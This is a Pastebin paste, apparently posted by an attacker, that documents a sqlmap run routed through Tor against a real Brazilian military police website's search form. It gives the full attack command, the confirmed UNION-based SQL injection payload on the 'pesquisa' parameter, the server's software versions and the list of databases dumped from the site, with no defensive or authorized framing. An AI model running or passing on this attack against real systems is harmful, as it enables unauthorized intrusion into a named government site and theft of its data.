Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [Twitter]: https://twitter.com/0xFrenetic
- PoC: http://www.pm.pi.gov.br/buscar.php
- # Execute: ./sqlmap.py --tor --tor-type=SOCKS5 -u http://www.pm.pi.gov.br/buscar.php --form --dbs --random-agent
- PrintScreen: http://i.imgur.com/jkYCB4d.png
- [#2] form:
- POST http://www.pm.pi.gov.br:80/buscar.php
- POST data: pesquisa=
- do you want to test this form? [Y/n/q]
- > Y
- Edit POST data [default: pesquisa=] (Warning: blank fields detected): [Enter]
- do you want to fill blank fields with random values? [Y/n] Y
- [16:30:27] [INFO] POST parameter 'pesquisa' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
- [16:30:27] [INFO] checking if the injection point on POST parameter 'pesquisa' is a false positive
- POST parameter 'pesquisa' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
- sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:
- ---
- Parameter: pesquisa (POST)
- Type: UNION query
- Title: Generic UNION query (NULL) - 6 columns
- Payload: pesquisa=EFFw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qxqbq','NQxxIsSZSEPCyiXZhBQJcBABIkPjScTJREYfLYqR'),'qzkvq')-- rJVs
- ---
- do you want to exploit this SQL injection? [Y/n]
- [16:30:56] [INFO] testing MySQL
- [16:30:58] [INFO] confirming MySQL
- [16:31:01] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Debian 6.0 (squeeze)
- web application technology: PHP 5.3.3, Apache 2.2.16
- back-end DBMS: MySQL >= 5.0.0
- [16:31:01] [INFO] fetching database names
- available databases [2]:
- [*] conteudopm
- [*] information_schema
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement